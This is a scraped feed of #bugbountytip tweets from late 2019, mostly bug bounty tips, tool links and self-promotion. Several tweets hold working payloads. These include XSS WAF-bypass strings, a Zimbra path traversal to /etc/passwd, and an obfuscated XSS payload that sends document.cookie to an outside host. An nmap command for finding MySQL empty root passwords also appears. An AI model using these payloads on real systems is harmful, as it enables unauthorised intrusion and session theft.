1 XSS waf bypass challenge... Please share your favorite xss payload for waf bypass... My favorite : ">'><details/open/ontoggle=confirm('XSS')> #bugbountytip #bugbountytips #hackingcommunity
James Nunes
@jamesgnunes


2020-01-04 13:39:08
0 So, @Xiaomi says it has fixed Mi Home Security Camera bug that displayed pictures from other cameras on Google Nest hub. https://t.co/6b5btrAPnk #Xiaomi #Google #bugbountytip #bughead #tech #TechNews #technology #blog #blogger #WordPress
Evan Custodio
@defparam


2020-01-04 00:13:12
0 An HTTP Request Smuggling CL.TE bug lets you redirect a victim connection to a forged endpoint with GET parameters. FYI you can execute a forged graphql query this way on the victim by using: GET /graphql?query=<query> #bugbountytip
m0z
@LooseSecurity


2020-01-03 19:48:43
7 A cool list by @vaib25vicky which indexes useful resources for educating yourself about mobile security! It's a cool area to get into with lots of #bugbounties to be found. https://t.co/AZpQyQNwUN #BugBounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2020-01-03 19:46:57
0 Awesome tool to get your target initial recon! #infosec #bugbountytip https://t.co/ysJXq6Yi4t
Bala Elangovãn
@balaelangovan03


2020-01-03 18:47:40
1 My first blog about "How to get started in bug bounty? (Newbie's Perspective)". https://t.co/jHSoKDM7Yo #bugbountytips #bugbountytip #bugbounty
Ammar Amer
@cry__pto


2020-01-03 18:30:16
8 Practice part (2): https://t.co/X281shcjyP https://t.co/spNrTQFgSb https://t.co/vHcoFvviU4 https://t.co/sezBbjXqqh https://t.co/lN4dzsQzSK https://t.co/M9acV7uh2L https://t.co/3wpLokyrgW https://t.co/A1qXCSlOA3 https://t.co/XiR5giK6K9 #BugBounty #bugbountytip #hacking #pentest
noobSecurity
@noobsec_org


2020-01-03 02:00:45
5 P1 on new year (zimbra LFI) [https://t.co/Ab4o1tOu0o]/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 #bugbounty #togetherwehitharder #bugbountytips #bugbountytip https://t.co/NH7meUlaH0
m0z
@LooseSecurity


2020-01-02 20:30:41
1 We are almost at 1,000 members in the League of Bounties discord server! Thanks to all the members who always make it a great chat. :) https://t.co/tVOlrpA4KP #bugbountytips #BugBounty2020Goals #bugbountytip
Arshad Aman
@MeArshadaman


2020-01-02 14:57:03
0 When You Go to HackerOne and see Bounty of $20000 but already claimed by someone else, Then #hacking #cybersecurity #BugBounty2020Goals #bugbountytip @Hacker0x01 @Bugcrowd https://t.co/M6xq9TArVj
Selim Enes Karaduman
@Enesdex


2020-01-02 00:02:45
1 Are all subdomains of https://t.co/UJzSqq2q8o in scope or just https://t.co/I6tTfy4Xfw? I found a bug on a subdomain of spotify but I'm confused about its in scope or not #BugBounty #bugbountytips #bugbountytip #hackerone @Spotify @Hacker0x01 @alicanact60 https://t.co/44Xo60yvM9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 16:23:31
0 #Protip: If a website uses your photo and crops them into the avatar, there may be a good chance that the website is using ImageMagick to do that. Follow Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
Elsadat ✪
@M0_SADAT


2020-01-01 14:53:06
0 Yaaay, what a great start of 2020!!! Just discovered my 2nd SQL injection on private program @Bugcrowd ! I guess I’m the 1st hacker found P1 on 2020🔥 Happy new year https://t.co/rYxy7EDxzk you made my day😂 #bugbountytip SQLI still alive! #bugbounty #HappyNew2020 #hacking https://t.co/G1GJuet3A4
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 12:11:47
3 Thats When We Decided To Become BUG HUNTERS ! ❤️💰💰💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/Ki3Tvkbeia
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 08:45:22
0 Happy New Year Hackers and Bug Bounty Hunters ! Have an Awesome Year with lots of Bounties and $$ Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting https://t.co/7t7Lm5yn0r
drivertom
@drivertomtt


2020-01-01 01:50:28
2 Just curious about whether twitter bots click Like merely by hashtag #malware #APT #cybersecurity #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:50:41
1 Here are 2 tools which are useful for scraping subdomains/directories in javascript files. https://t.co/VCZ4tzZamU by @jobertabma https://t.co/b0NRR2ub2w by the best hacker in the world #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:45:48
3 I'm still hosting 2 #XSS challenges on my challenge site! https://t.co/cNYQsW7qVi Both were inspired by real bounties I have found! If you haven't already tried your hand at them, it's well worth a go. #bugbounty #bugbountytip #bugbountytips #infosec
Ammar Amer
@cry__pto


2019-12-31 19:40:35
4 #bugbounty tools part (1): tko-subs:https://t.co/Tawtj1NvWc truffleHog:https://t.co/B3OeZDOdH0 subfinder:https://t.co/QqNOKFuHk1 sslScrape:https://t.co/448jbQ2nbw Gobuster:https://t.co/NI2PnTIFdy SecLists:https://t.co/QPSqeXvWix EyeWitness:https://t.co/461kpUL5CA #bugbountytip
Khaled
@Khaled95677506


2019-12-30 17:34:29
0 My 1st RCE😎 With my bro Osama Alaa. Don't forget to test PHP-CGI, it may give you RCE #bugbountytips #BugBounty #bugbountytip https://t.co/iyLami2sWr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-30 17:32:47
0 StrandHogg Bug - Unpatched Android OS Vulnerability #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/8Cr6ShD9jf
Nick || hunt4p1zza
@ngkogkos


2019-12-30 16:58:55
0 Need target specific folders list for fuzzing based on robots.txt? Use @TomNomNom's meg tool: 1. meg -c 200 path.txt urls.txt meg_robots 2. cat meg_robots/index | grep "200 OK" | awk '{print $1}'| xargs cat | grep "Disallow:" | awk '{print $2}' | sort -u #bugbountytip #bugbounty
bug bounty tips - Retweet
@BugbountytipsR


2019-12-30 13:22:23
2 CAN YOU EARN $15000 BY CLICKJACKING? Raushan Raj ========== ^This man did [Tag him if you know his twitter handle] #bugbountytips #bugbountytip WriteuP https://t.co/QhE7nmsJEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-30 12:21:45
6 ✈️Use Telegram bot as a Penetration Testing Framework 🏆🏆🎖🎖💰💰 Follow this page and learn Bug Bounty Tips and Tricks https://t.co/27kPwhJVdt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone
Larouanne Tristan
@Tr4LSecurity


2019-12-30 10:47:25
0 Doing some #pentesting in a company using #maven ? Look for xml file in the user .m2 folder. This contains password easily decryptable https://t.co/dg9nBqjWoT #infosec #hacking #pentest #CyberSecurity #bugbountytips #bugbountytip #java
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-30 10:34:05
0 #burp #bugbountytips #bugbountytip RCE with Burp Suite intruder + Regex https://t.co/JmpAvEfNr3 via @YouTube
Men up
@uppmen


2019-12-30 00:42:39
0 How did I earn $3133.70 from Google Translator? @Google @TranslateTricks #BugBounty #bugbountytip #BugBounty2020Goals 😆 https://t.co/nVwersBz1n
Dr.FarFar ⓲
@3XS0


2019-12-29 20:53:47
0 Old #bugbountytip from 5 years ago! https://t.co/4o2f9Wgs7A …
ghostlulz
@ghostlulz1337


2019-12-29 19:52:43
13 Source Code Analysis SQLI: https://t.co/m5K3yzo6iU Source Code Analysis XSS: https://t.co/Ke274Lvc9e Source Code Analysis Race Condition: https://t.co/jycSCNE9ms Bug Bounty Book - https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #redteam #infosec #xss #dfir https://t.co/vP7FxiOTGH
Nick || hunt4p1zza
@ngkogkos


2019-12-29 18:22:20
0 If you are not using @hacker_'s getallurls Go tool when doing #recon & #bugbounty you are missing out on interesting URLs/endpoints as it fetches from 3 sources: AlienVault/Wayback Machine/Common Crawl. Before using check you are not IP blocked from these. #bugbountytip https://t.co/rj0EjuXs1t
Sahil Ahamad
@ehsahil


2019-12-29 16:11:02
11 Time for #bugbountytip - always look for 3 types of employee in a company from Linkedin or other sources. 1. DevOps/SRE 2. Data Science 3. Tech Interns It will help a lot from your recon perspective and you will be amazed to see the results. #bugbountytips #HappyHacking
ghostlulz
@ghostlulz1337


2019-12-29 15:56:37
5 Clickjacking is an easy $100 - $500 vulnerability. Super easy to find and often forgotten by developers and hunters alike. Easy wins all day. More info on my blog: https://t.co/kcOYSJcbUG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #redteam #dfir https://t.co/4zPbulEHqC
Andy Garcia
@GaelleTjat


2019-12-29 15:49:12
2 For sure horizontal moves require some form knowledge of the vertical ones. Referring to the Cors Lab 3 where you need to know/read XSS in order to solve the lab 🤦🏾‍♀️🤦🏾‍♀️🤦🏾‍♀️ #BugBounty #bugbountytip #BugBounty2020Goals
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-29 15:18:24
0 If you spend most of your time in low speed internet connection like me i.e > 100KB/sec just use Google cloud shell which is free or just use a cheap vps providers like digital ocean :) #bugbountytip https://t.co/CvazXZy8p1
bug bounty tips - Retweet
@BugbountytipsR


2019-12-29 03:45:01
0 "The more you talk, the more they REVEAL" TIP : Check The Server Response Carefully x 3 Tool TIPs: You can modify response by burp [FACEBOOK HACKED] by EVIL BOY AJAY @evilboyajay wRITEUp https://t.co/26eGroHHNu #bugbountytip #bugbountytips
🧠🏴‍☠️Borbolla
@renatoborbolla


2019-12-29 03:29:38
0 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #Pentesting
Pentester /KökBüre
@GokBoruEfe


2019-12-28 23:40:34
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
plenum 🇹🇳
@plenumlab


2019-12-28 20:52:16
0 There are only two kinds of infosec folks: - Those who say P.O.C - Those who say POC as POK There you have it now you know. #bugbountytips #bugbountytip
Antonio
@HerrJoost


2019-12-28 20:25:31
2 Best budget notebook focused on programming /#bugbounty? #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-28 16:17:21
7 Cross-Origin Resource Sharing (CORS) can be used to bypass the Same Origin Policy(SOP) and read sensitive user data if implemented improperly. Easy wins all day. Learn more on my blog: https://t.co/ZdNpP9a3hy #BugBounty #bugbountytip #bugbountytips #infosec #appsec #osint #cors https://t.co/hR0qm2YeGc
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-28 14:58:50
0 #bugbountytips #bugbountytip #Brutelogic #knoxss Thank @rodoassis for this test page. When you love xss and try do it in your phone browser: Android mozilla https://t.co/sRV8TzIgIP
ghostlulz
@ghostlulz1337


2019-12-28 13:31:41
30 If your looking to make a living doing bug bounties or penetration testing you may want to get a copy of my book: https://t.co/zJFRZjg5q2 #bugbounty #xss #osint #redteam #bugbountytips #bugbountytip #infosec https://t.co/fVT4hqpfpi
Ashish Kunwar
@D0rkerDevil


2019-12-28 12:50:58
1 #bugbountytip do asn lookups and do nmap scan on cidr range[s]. and you might end up with jucy services like rpcbind , snmp etc or panels having default creds.
Nouroz Gaming
@NourozGaming


2019-12-28 10:01:10
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 08:15:48
9 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 07:58:17
17 Reverse Shell Cheat Sheet TooL: https://t.co/ROjGR5MCTl #bugbountytip #hacking #pentest https://t.co/00p6QbX7sO
Ammar Amer
@cry__pto


2019-12-28 07:53:24
7 JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool: https://t.co/EMKunAzMS5 #bugbountytip #hacking #pentest
m0z
@LooseSecurity


2019-12-28 00:51:41
0 A nice find by @s3c_krd which is definitely worth checking out: https://t.co/JRj3kv0zDI CRLF Injection is kinda rare to come by these days, but and this was a cool PoC on Twitter. :) #bugbounty #bugbountytip #bugbountytips
Th3Alch3mist~
@Debian_Hunter


2019-12-27 17:06:41
2 Found this in a write-up and this is cool ....have a look XSSI:- https://t.co/s6baugCH6l JSONP:- https://t.co/BNkRFlwTnN #bugbountytips #bugbounty #bughunting #bugbountytip https://t.co/9SXzd4t9Kw
Tinu rockk
@TinuRock007


2019-12-27 15:41:10
0 finally secure @sony 2019 arrived as xmas gift :) #swag #bugbountytips #bugbountytip #cybersecurity #sony #hackerone #togetherwehitharder https://t.co/77H3eJ2uV9
Mashoud1122
@mashoud1122


2019-12-27 09:28:34
2 Did my 1st collab with @OriginalSicksec and @Skeletorkeys We got an amazing XSS on https://t.co/mVGZMsShQL WAF Bypass used: document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>') #bugbountytips #bugbountytip #BugBounty https://t.co/xkL6Dr47ed
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-27 06:40:48
0 Hey @NahamSec just so you know people in India pronounce your name as "Ben shani-singhnapur" ! 🙃 #bugbounty #bughunter #bugbountytips #bugbountytip
cor3_cls
@cor3_cls


2019-12-26 20:01:06
3 @enigmaticsoulrg @zPrototype2 @gobias_infosec paid: @PentesterLab. Free: @hacker0x01 Hacker101 site and CTF. @Bugcrowd levelup and university <3 (youtube & git), and the best for me is @PortSwigger @WebSecAcademy Also #bugbountytip hashtag and @intigriti tips are very informative.
Karna
@karna__1


2019-12-26 17:56:24
0 To all those who want to know 'How do I get started with Bug Bounties?', go through the threads! #bugbounty #bugbountytips #infosec #bugbountytip #gettingstarted https://t.co/kgXdWqIHJ2
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-26 13:09:29
5 Port scanning can be seen as, or construed as, a crime. We should never execute a port scanner against any website or IP address without explicit, written permission from the owner of the server or computer that you're targeting #infosecurity #infosec #cybersecurity #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-26 10:29:34
2 Check out my new blog about Bypassing Brand Collabs Manager Eligibility. #bugbountytip #bugbounty #cybersecurity https://t.co/VpLI1UNVz6
Nassec.io
@nassecio


2019-12-26 10:26:23
3 @evilboyajay has a new write up for the bug bounty community. Check out our weekly blog about Brand Collabs Manager bypass on Facebook. #infosec #infosecmatters #hacking #bugbounty #bugbountytip https://t.co/4TDqHCMUso
Andy InfoSec
@AndyInfoSec_


2019-12-26 07:22:01
0 Part 3: Resources about #GraphQL #bugbounty Facebook GraphQL CSRF: https://t.co/7LnN4yo1Zp Tools : https://t.co/I52mNTERIN https://t.co/MHIuNuvaHC https://t.co/qlCtI5KJMI https://t.co/LPOkb9LtSj #cybersecurity #bugbountytip #bug #bounty #vapt #andyinfosec
Texy45
@RegisDeldicque


2019-12-26 06:06:42
0 @yeswehack @intigriti #bugbountytips #bugbountytip Tips : if your target forward http to https urls, try to add %0a char at the end of http urls. You could probably find out juicy paths.
Asad Anwar
@AsadAnw90


2019-12-25 23:25:13
0 Always look "view-source" page, sometime html page containing secret key. #bugbountytip #bugbounty https://t.co/VxzIgzVd06
Cryptographer
@crypt0gr4ph3r


2019-12-25 16:50:02
0 #bugbountytip When token says invalid on password change when unauthorisation. Try to use the same invalid token when authorisation. Low severity acount takeover , awarded $200 bounty #hackerone #bugbounty #hacker101
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-25 07:22:52
0 OWASP Events Calendar - Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #eccouncil #owasp #hackerone https://t.co/q2BFcxrK65
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-25 07:14:39
3 Windows Process Hacking Library Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #FolloMe https://t.co/t6TtdwgfQm
Sayaan Alam
@ehsayaan


2019-12-25 06:01:11
0 Finally Done with LazyRecon Set-Up on Ubuntu VM , Thanks to @NahamSec For this great script.. #bugbountytip #bugbounty https://t.co/XLxtx3FAKS
warbid
@id_warb


2019-12-25 02:02:44
0 Why does everyone talk about PDO if it doesn't work? Yet another case IRL. #bugbountytip https://t.co/efz78UQSd6
bug bounty tips - Retweet
@BugbountytipsR


2019-12-24 16:22:32
0 WEB CACHE POSITIONING HOST HEADER INJECTION by James Kettle @albinowax #bugbountytip #bugbountytips #bugbounty https://t.co/Lau7339zXG
Jinone
@jinonehk


2019-12-24 07:47:07
1 New Write-up About a dom xss From a private project 500$ https://t.co/oa4JnqhtwB Merry Christmas to you all ! Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-12-24 07:40:18
3 Finding root accounts with an empty password in MySQL servers: nmap -p3306 --script mysql-empty-password xx.xx.xx.xx #Hacking #bugbountytip #Pentesting
Sayaan Alam
@ehsayaan


2019-12-24 02:32:45
0 Yay!!! Another 10k Awarded From TataCliq For Multiple Rate Limiting Issues!!! Great BB Program.. 2 More Triaged.. #bugbounty #bugbountytip #togetherwehitharder
Ricardo Freitas
@0x61737078


2019-12-24 02:11:26
0 RT @andripwn: RT @pwn0sec: Web cache poisoning attack https://t.co/6f6dxXBZTL #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Ash
@m0rph1n3e


2019-12-23 23:15:55
0 is it possible to bypass the file extension in Local File Inclusion? URL Example: https://blahblahblah/?language=english which reads from english.html ( only html files ) #bugbounty #bugbountytip #bugbountytips #hacker0x01 #LFI
Security Executions Code
@pwn0sec


2019-12-23 20:58:18
0 File Path Traversal Using Burp-suite (Intruder) https://t.co/CmPakEgzfB #bugbountytip #bugbountytips #path_traversal #burpsuite #intruder
ghostlulz
@ghostlulz1337


2019-12-23 17:03:56
9 A Race Condition allowed one person to steal over $1,000,000 dollars from an ATM. If your curious how to detect these type of flaws check out my blog: https://t.co/jycSCNE9ms #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #xss #pentest #appsec #DFIR https://t.co/DxXsgzyZ0Z
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-23 11:05:40
2 Top #pentesting and Bug Bounty Burp Extensions https://t.co/naoLUFqmPu #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-23 11:03:19
4 Hardware Hacker Bee #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops https://t.co/KHAvODLYHa
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-22 21:40:06
1 #bugboutytips, #bugbountytip, #burp Detect file path traversal by Burp Suite intruder + regext https://t.co/T1xb4tCsLV via @YouTube
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-22 21:37:21
2 #bugbountytip, #bugbountytips, #burp, #xss Easy way detect easy reflect XSS. Easy Reflect XSS Burp Intruder https://t.co/oYRVhwD1VA via @YouTube
Ammar Amer🇸🇾
@cry__pto


2019-12-22 16:49:04
0 Pentesting-Bible #hacking #pentest #redteam #OSINT #malware #CyberSecurity #ctf #bugbountytip it is just the beginning!👍😎 https://t.co/MmUnOQkJ7a
Andy Garcia
@GaelleTjat


2019-12-22 16:48:33
0 Great reading. #Infosec #Infosectips #bugbountytip https://t.co/NmloxT9KE3
Sunil
@Sunilkande1137


2019-12-22 14:33:19
0 Vimeo upload function SSRF by @dPhoeniixx https://t.co/DMIZfZoHJA #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #ssrf #hacking
ईशान सिंह
@R0X4R


2019-12-22 13:23:57
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/98c2ORAMwW
Karna
@karna__1


2019-12-22 13:08:46
0 Converted IP formats can be used to bypass blacklisted IP addresses while trying SSRFs. You just need to do 3 steps and you can convert formats at any time using your terminal. Happy Hunting! #bugbountytip #bugbountytips #infosec #AUTOMATION (2/2)
Ammar Amer🇸🇾
@cry__pto


2019-12-22 08:56:42
1 -1-2000 articles as pdf files & 2000 links to advanced articles and resources about different fields of ethical hacking and programing -2-114 detailed osint tips: -how to gather info & why -useful tools https://t.co/xGKKQoPyyq #bugbountytip #Hacking #OSINT #Pentesting #redteam
Brodie Codie ™
@brodie_codie


2019-12-22 07:31:56
0 Not a bad week, submitted 5 Cross-site scripting (XSS) vulnerability Reports... now the waiting game begins <a onmouseover="alert(document.cookie)">xxs link</a> "><img src=x onerror=alert(domain)> #bugbountytips #bugbountytip
ईशान सिंह
@R0X4R


2019-12-22 04:58:41
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/9vrKqD7lnY
Hendrik
@hendrikvb


2019-12-21 21:00:28
0 Obviously whatweb (@urbanadventur3r) will provide interesting results too! #bugbountytip https://t.co/z1uuPGsmcZ
ghostlulz
@ghostlulz1337


2019-12-21 13:04:48
4 🎅 MERRY CHRISTMAS 🎅 If you'r looking for a good read over the holiday you should check out my Bug Bounty Book. Instead of spending money you could be making money💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #osint #xss #appsec #dfir #redteam #hackers https://t.co/wWp4w7lmFM
drivertom
@drivertomtt


2019-12-21 12:13:30
0 How to defeat webshell scanners #bugbountytips #bugbountytip https://t.co/A79IMJYhtk
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:46:45
0 @iagox86 Tools - Padbuster Poracle Ciphers - CAST-cbc aes-128-cbc aes-192-cbc aes-256-cbc bf-cbc camellia-128-cbc camellia-192-cbc camellia-256-cbc cast-cbc cast5-cbc des-cbc des-ede-cbc des-ede3-cbc desx-cbc rc2-40-cbc rc2-64-cbc rc2-cbc seed-cbc #bugbountytip #bugbountytips 2/2
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:42:02
0 DECRYPT CIPHER WITHOUT THE KEY Padding Oracle Attack in Detail by Ron Bowes @iagox86 Explanation https://t.co/KWuU3SruSj An Example https://t.co/u0DcQnqa0o Encrypt data https://t.co/NnH2sXuoXT Practice https://t.co/xtgWVCO63p #Pastebin #bugbountytip #bugbountytips (1/2)
ghostlulz
@ghostlulz1337


2019-12-21 02:32:20
8 Wayback SQL Scanner - https://t.co/IcaV2mPjQV Swagger API - https://t.co/5toTZrRmdz New Robots.txt - https://t.co/IsyaPyECWG CSV Injection - https://t.co/loAf6mRXft XXE - https://t.co/vhpq7Bjg4d #BugBounty #bugbountytips #bugbountytip #infosec #osint #xss #appsec #hacking https://t.co/DGkhLNFata
Tarek Mohammed
@Conan0x3


2019-12-20 21:05:46
0 - Get a slack notification from "Monitorizer" about new sub-domains for a target - Found sub-domain for splunk enterprise - Search exploits for current version - Found CVE allow to disclose the server info along with product license key :D #bugbountytip #BugBounty https://t.co/fULk1BZbwP
Inon Shkedy
@InonShkedy


2019-12-20 01:50:06
2 Pentest for APIs? Leverage the predictable nature of REST APIs to find admin API endpoints! For example, if you saw the following API call: GET /api/v1/users/<id> Give it a chance, and change to DELETE / POST to create / delete users. #bugbountytip #bugbounty
Jesse Clark
@Hogarth45_ND


2019-12-19 23:12:22
1 On @Hacker0x01 use the Scope Version page to be ensured you are seeing the entire scope for program. Some times you can find several domains listed that are not reflected on the regular policy page. #bugbountytip https://t.co/9aHu40ON8I
Kenan
@h1_kenan


2019-12-19 21:59:09
0 It is time! https://t.co/oVgbVlEwQj #XSS #hacking #security #bugbountytip Please RT if you like. thanks
Yadhavi
@PrincessYadhavi


2019-12-19 18:44:19
2 "$HOME/bugbounty/paltform(ht,bugcrowd,etc)/program(verizonmedia)/target(yahoo)/target(com)(if scope has multiple TLDs)/date(dec-20)/tool(masscan)/filename (with toolname to easily identify)(yahoo.com-masscan.txt)" #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2019-12-19 18:39:53
0 Use same directory structure on all of your systems.(windows, kali vm, vps). It'll save a lot of time. my directory structure for masscan on yahoo: "$HOME/bugbounty/h1/verzionmedia/yahoo/com/dec-20/masscan/yahoo.com-masscan.txt" #bugbountytips #bugbounty #bugbountytip
Apoorv Raj Saxena
@secxena


2019-12-19 16:02:04
1 I just published CredCheck — A credential Pentesting framework #bugbountytool #bugbounty #bugbountytip #Section144 https://t.co/zVlMCiIhpN
ak1t4 🇦🇷
@akita_zen


2019-12-19 15:52:43
1 #bugbountytip: The Program always has the last word, Not the Triaging Analyst. Keep pushing until program security team ping you with a "clear" feedback. *Most of triagers/analyst prioritizes customers than bugbounty hunters , even when your report is valid. #bugbounty #infosec
Sebastian Wieseler
@kickino


2019-12-19 14:13:45
0 Second subdomain takeover within a few days. 🥳🥳 The bugs are all around. They’re just waiting for you to find them 😁😁 #bugbounty #bugbountytip #togetherwehitharder
Sanketh Sharath
@sharathsanketh


2019-12-19 13:38:04
3 After 6 months of bug hunting, i have taken a step back to pause and go back to reading and training (labs) this month. On reading again, I realised I didn't know shit about shit. Learning never ends. I really recommend newbies do this! #bugbounty #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2019-12-19 11:56:28
0 Parameter Pollution #bugbountytips #bugbountytip #bugbounty https://t.co/UolTrcx2q8
Fisher
@Regala_


2019-12-19 09:13:28
0 Actually, here's my top tip for writing a good report: you should be able to follow and reproduce the steps on YOUR own report after some time has passed #bugbounty #bugbountytip
d0nut
@d0nutptr


2019-12-19 01:03:37
0 @John08369305 @uraniumhacker @intigriti You might say “then teach them!” Which I have more than most... but even the people I’ve spent hours on don’t seem to “get it”. Then they go around bringing others down with their misunderstandings. Just look at #bugbountytip . Like half of these are garbage.
mohsin khan
@mohsink83789226


2019-12-18 16:57:34
0 Please share web pentesting resources with me #bug #bugbountytips #bugbountytip #hacking #Hacker #bountyhunter #bounty
Rafin Rahman Chy
@rafinrahmanchy


2019-12-18 14:06:23
6 Required Skills for Facebook Bug Bounty *Web App Pentesting *Facebook API *graphQL *Burp Suite *Studying PoCs #BugBounty #bugbountytip #bugbountytips #EthicalHacker #EthicalHacking #Hacking #Hacker #Hackers #InfoSec #Infosecurity #ITsecurity #ITSec #netsec #appsec #websecurity https://t.co/AprGSWj64P
0x8hany
@Haniawad


2019-12-18 02:25:10
5 As @zseano always saying lazy developer reuse the code :) #BugBounty #bugbountytip https://t.co/NKfPRcd5f0
ghostlulz
@ghostlulz1337


2019-12-17 21:27:13
7 SQL injection is one of the most popular vulnerabilities out there yet there seems to be a lack of people who can identify this flaw in an applications source code. More info on by blog: https://t.co/m5K3yzo6iU #BugBounty #bugbountytip #bugbountytips #infosec #xss #sqli #osint https://t.co/BeKWOSmNpY
Fisher
@Regala_


2019-12-17 15:31:24
2 Flexing of the day 😇 (impact took a beating) If you need help/tips -> reply below with SPECIFIC questions other than where to start, how to get crit, etc #bugbountytip https://t.co/GGpecf900H
Dhamu
@Dhamu_offi


2019-12-17 10:44:05
1 #bugbountytip #bugbounty Abusing feature to steal your tokens https://t.co/jN2AvQDQ7i
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 10:20:33
2 Best guideline to become a Web Application Security Researcher in my opinion https://t.co/uVslvJiX80 #EthicalHacking #EthicalHacker #Hacking #Hacker #WebSecurity #BugBounty #bugbountytip #bugbountytips #netsec #AppSec #InfoSec #ITsecurity #CyberSecurity #Pentesting #pentest
Dhamu
@Dhamu_offi


2019-12-17 10:17:30
7 #bugbountytip #bugbounty Hacking GitHub with Unicode's dotless 'I'. #Vulnerability: Password reset emails delıvered to the wrong address. https://t.co/VKRlN2AxdH
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 09:33:35
